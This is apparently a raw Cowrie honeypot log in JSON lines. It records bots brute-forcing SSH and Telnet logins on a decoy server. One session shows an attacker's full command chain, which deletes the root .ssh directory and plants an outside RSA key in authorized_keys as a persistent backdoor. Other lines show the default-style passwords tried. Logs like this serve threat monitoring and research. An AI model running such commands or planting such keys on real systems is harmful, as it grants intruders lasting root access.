{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T07:49:30.215369Z","src_ip":"212.227.235.229","session":"0cd80482baab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:49:30.216391Z","src_ip":"212.227.235.229","session":"0cd80482baab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52940,"dst_ip":"1.2.3.4","dst_port":22,"session":"823b6f398b18","protocol":"ssh","message":"New connection: 212.227.235.229:52940 (1.2.3.4:22) [session: 823b6f398b18]","sensor":"my-vps","timestamp":"2025-08-26T07:49:30.524739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:49:30.526051Z","src_ip":"212.227.235.229","session":"823b6f398b18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:49:30.838155Z","src_ip":"212.227.235.229","session":"823b6f398b18"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T07:49:32.115262Z","src_ip":"212.227.235.229","session":"823b6f398b18"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:49:33.427361Z","src_ip":"212.227.235.229","session":"823b6f398b18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53674,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a7d95851651","protocol":"ssh","message":"New connection: 212.227.235.229:53674 (1.2.3.4:22) [session: 0a7d95851651]","sensor":"my-vps","timestamp":"2025-08-26T07:49:33.734158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:49:33.735507Z","src_ip":"212.227.235.229","session":"0a7d95851651"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:49:34.043717Z","src_ip":"212.227.235.229","session":"0a7d95851651"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:49:35.318997Z","src_ip":"212.227.235.229","session":"0a7d95851651"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:49:35.628797Z","src_ip":"212.227.235.229","session":"0a7d95851651"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:49:35.630087Z","src_ip":"212.227.235.229","session":"0cd80482baab"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":42820,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd243c4a96d9","protocol":"ssh","message":"New connection: 45.88.8.215:42820 (1.2.3.4:22) [session: cd243c4a96d9]","sensor":"my-vps","timestamp":"2025-08-26T07:49:50.323053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:49:50.868340Z","src_ip":"45.88.8.215","session":"cd243c4a96d9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T07:49:50.869582Z","src_ip":"45.88.8.215","session":"cd243c4a96d9"}
{"eventid":"cowrie.login.success","username":"root","password":"Layak@123","message":"login attempt [root/Layak@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:49:53.071812Z","src_ip":"45.88.8.215","session":"cd243c4a96d9"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:49:53.465057Z","src_ip":"45.88.8.215","session":"cd243c4a96d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48874,"dst_ip":"1.2.3.4","dst_port":23,"session":"570a50afaf1d","protocol":"telnet","message":"New connection: 212.227.235.229:48874 (1.2.3.4:23) [session: 570a50afaf1d]","sensor":"my-vps","timestamp":"2025-08-26T07:50:32.582863Z"}
{"eventid":"cowrie.session.closed","duration":1.3731465339660645,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:50:33.955898Z","src_ip":"212.227.235.229","session":"570a50afaf1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48884,"dst_ip":"1.2.3.4","dst_port":23,"session":"31198f8a9980","protocol":"telnet","message":"New connection: 212.227.235.229:48884 (1.2.3.4:23) [session: 31198f8a9980]","sensor":"my-vps","timestamp":"2025-08-26T07:50:34.155645Z"}
{"eventid":"cowrie.session.closed","duration":1.4395005702972412,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:50:35.595074Z","src_ip":"212.227.235.229","session":"31198f8a9980"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48888,"dst_ip":"1.2.3.4","dst_port":23,"session":"552a87ae899e","protocol":"telnet","message":"New connection: 212.227.235.229:48888 (1.2.3.4:23) [session: 552a87ae899e]","sensor":"my-vps","timestamp":"2025-08-26T07:50:35.799523Z"}
{"eventid":"cowrie.session.closed","duration":1.4593183994293213,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:50:37.258752Z","src_ip":"212.227.235.229","session":"552a87ae899e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48902,"dst_ip":"1.2.3.4","dst_port":23,"session":"9afbf2653c61","protocol":"telnet","message":"New connection: 212.227.235.229:48902 (1.2.3.4:23) [session: 9afbf2653c61]","sensor":"my-vps","timestamp":"2025-08-26T07:50:37.461013Z"}
{"eventid":"cowrie.session.closed","duration":0.9036424160003662,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:50:38.364564Z","src_ip":"212.227.235.229","session":"9afbf2653c61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48906,"dst_ip":"1.2.3.4","dst_port":23,"session":"3086ead36c2d","protocol":"telnet","message":"New connection: 212.227.235.229:48906 (1.2.3.4:23) [session: 3086ead36c2d]","sensor":"my-vps","timestamp":"2025-08-26T07:50:38.565132Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T07:50:39.330414Z","src_ip":"212.227.235.229","session":"3086ead36c2d"}
{"eventid":"cowrie.session.closed","duration":2.7799501419067383,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:50:41.344992Z","src_ip":"212.227.235.229","session":"3086ead36c2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40740,"dst_ip":"1.2.3.4","dst_port":23,"session":"473e9e50c675","protocol":"telnet","message":"New connection: 212.227.235.229:40740 (1.2.3.4:23) [session: 473e9e50c675]","sensor":"my-vps","timestamp":"2025-08-26T07:50:41.544904Z"}
{"eventid":"cowrie.session.closed","duration":1.3023755550384521,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:50:42.847211Z","src_ip":"212.227.235.229","session":"473e9e50c675"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40746,"dst_ip":"1.2.3.4","dst_port":23,"session":"6354412ea277","protocol":"telnet","message":"New connection: 212.227.235.229:40746 (1.2.3.4:23) [session: 6354412ea277]","sensor":"my-vps","timestamp":"2025-08-26T07:50:43.054631Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-26T07:50:44.528161Z","src_ip":"212.227.235.229","session":"6354412ea277"}
{"eventid":"cowrie.session.closed","duration":3.8342301845550537,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:50:46.888770Z","src_ip":"212.227.235.229","session":"6354412ea277"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40752,"dst_ip":"1.2.3.4","dst_port":23,"session":"613195ab628b","protocol":"telnet","message":"New connection: 212.227.235.229:40752 (1.2.3.4:23) [session: 613195ab628b]","sensor":"my-vps","timestamp":"2025-08-26T07:50:47.110816Z"}
{"eventid":"cowrie.login.success","username":"root","password":"86981198","message":"login attempt [root/86981198] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:50:47.732057Z","src_ip":"212.227.235.229","session":"613195ab628b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:50:47.780330Z","src_ip":"212.227.235.229","session":"613195ab628b"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T07:50:48.133641Z","src_ip":"212.227.235.229","session":"613195ab628b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:50:49.198211Z","src_ip":"212.227.235.229","session":"613195ab628b"}
{"eventid":"cowrie.session.closed","duration":2.092815637588501,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:50:49.203556Z","src_ip":"212.227.235.229","session":"613195ab628b"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":35222,"dst_ip":"1.2.3.4","dst_port":23,"session":"87e0ac358226","protocol":"telnet","message":"New connection: 123.31.39.100:35222 (1.2.3.4:23) [session: 87e0ac358226]","sensor":"my-vps","timestamp":"2025-08-26T07:51:12.157434Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45387,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c94f49da70b","protocol":"telnet","message":"New connection: 212.227.235.229:45387 (1.2.3.4:23) [session: 2c94f49da70b]","sensor":"my-vps","timestamp":"2025-08-26T07:51:13.312980Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33145,"dst_ip":"1.2.3.4","dst_port":23,"session":"306ca3fb5b72","protocol":"telnet","message":"New connection: 212.227.235.229:33145 (1.2.3.4:23) [session: 306ca3fb5b72]","sensor":"my-vps","timestamp":"2025-08-26T07:51:14.345723Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6101,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d506d3824c4","protocol":"ssh","message":"New connection: 212.227.125.160:6101 (1.2.3.4:22) [session: 7d506d3824c4]","sensor":"my-vps","timestamp":"2025-08-26T07:51:19.554338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T07:51:19.619178Z","src_ip":"212.227.125.160","session":"7d506d3824c4"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T07:51:19.684628Z","src_ip":"212.227.125.160","session":"7d506d3824c4"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T07:51:20.639018Z","src_ip":"212.227.125.160","session":"7d506d3824c4"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:51:20.640471Z","src_ip":"212.227.125.160","session":"7d506d3824c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44668,"dst_ip":"1.2.3.4","dst_port":23,"session":"1e2d53c76bd7","protocol":"telnet","message":"New connection: 212.227.235.229:44668 (1.2.3.4:23) [session: 1e2d53c76bd7]","sensor":"my-vps","timestamp":"2025-08-26T07:51:38.342756Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64714,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ab833398aa4","protocol":"ssh","message":"New connection: 212.227.235.229:64714 (1.2.3.4:22) [session: 7ab833398aa4]","sensor":"my-vps","timestamp":"2025-08-26T07:51:49.670348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:51:49.674081Z","src_ip":"212.227.235.229","session":"7ab833398aa4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:51:49.774564Z","src_ip":"212.227.235.229","session":"7ab833398aa4"}
{"eventid":"cowrie.login.success","username":"root","password":"Root@123#","message":"login attempt [root/Root@123#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:51:50.166765Z","src_ip":"212.227.235.229","session":"7ab833398aa4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:51:50.400631Z","src_ip":"212.227.235.229","session":"7ab833398aa4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:51:50.401293Z","src_ip":"212.227.235.229","session":"7ab833398aa4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:51:50.402767Z","src_ip":"212.227.235.229","session":"7ab833398aa4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:51:50.504805Z","src_ip":"212.227.235.229","session":"7ab833398aa4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:51:50.723875Z","src_ip":"212.227.235.229","session":"7ab833398aa4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T07:51:50.724535Z","src_ip":"212.227.235.229","session":"7ab833398aa4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T07:51:50.826935Z","src_ip":"212.227.235.229","session":"7ab833398aa4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:51:50.827810Z","src_ip":"212.227.235.229","session":"7ab833398aa4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63100,"dst_ip":"1.2.3.4","dst_port":22,"session":"63ab727a759d","protocol":"ssh","message":"New connection: 212.227.235.229:63100 (1.2.3.4:22) [session: 63ab727a759d]","sensor":"my-vps","timestamp":"2025-08-26T07:51:50.930762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:51:50.936220Z","src_ip":"212.227.235.229","session":"63ab727a759d"}
